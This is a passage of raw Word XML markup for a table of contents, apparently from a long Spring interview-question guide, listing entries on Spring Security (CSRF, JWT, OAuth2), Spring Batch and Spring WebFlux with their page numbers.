        <w:p w14:paraId="4C433841" w14:textId="7D8725E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4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CSRF and how does Spring Security protect against it?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307944 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>607</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49D1E8DC" w14:textId="70B41A8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4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use of SecurityContextHolder?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307945 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>607</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14DF1232" w14:textId="4CFBA0A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4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is password encryption handled in Spring Security?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307946 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>607</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CC9CC93" w14:textId="25814CB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4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difference between hasRole() and hasAuthority()?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307947 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>607</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74B9F705" w14:textId="236287C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4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do you secure REST APIs using Spring Security?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307948 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>607</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D466FEF" w14:textId="74878BE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4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implement JWT in Spring Security?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307949 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>607</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3240D3B4" w14:textId="349A110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5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difference between stateless and stateful authentication?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307950 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>607</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C067CD9" w14:textId="4033FEB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5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OncePerRequestFilter?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307951 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>608</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FF09695" w14:textId="17726FE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5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exclude certain endpoints (like /login, /register) from Spring Security?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307952 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>608</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6BCD8E72" w14:textId="282C947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5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OAuth2 and how is it supported in Spring Security?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307953 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>608</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47DE8DB8" w14:textId="11405BB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5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OAuth in detail in Spring Boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307954 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>608</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FEFB1AC" w14:textId="4345760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5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JWT in detail in Spring Boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307955 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>611</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="697FE78D" w14:textId="2F92A3E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5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a few Security Algorithms?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307956 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>615</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6AE304C8" w14:textId="4D74C56C" w:rsidR="00012799" w:rsidRDefault="00012799">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307957" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Spring Batch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307957 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>616</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="223B5076" w14:textId="47AC7E9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5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Spring batch? Explain where you have used the spring batch in your project?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307958 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>616</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="588A969B" w14:textId="403EC50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5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spring batch works?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307959 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>617</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57C0AD0C" w14:textId="2DF52EE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6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implement the spring batch?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307960 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>618</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15BB7F0D" w14:textId="5D7B641F" w:rsidR="00012799" w:rsidRDefault="00012799">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307961" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Spring Reactive</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307961 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>621</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5505D975" w14:textId="28D5264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6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Spring Reactive framework?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307962 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>621</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C743F22" w14:textId="0AFF02B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6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y should we use Spring reactive?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307963 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>621</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72A6EF30" w14:textId="466F63A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6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Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307964 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>622</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0932FD9A" w14:textId="050C131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6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Spring WebFlux and Spring MVC?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307965 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>623</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0437A57C" w14:textId="3DC8862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6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are the advantages of Spring WebFlux over traditional Spring MVC?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307966 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>623</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65D443C9" w14:textId="410462F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6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a Mono in Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307967 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>624</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B3969A3" w14:textId="621416A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6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how Mono works?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307968 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>625</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
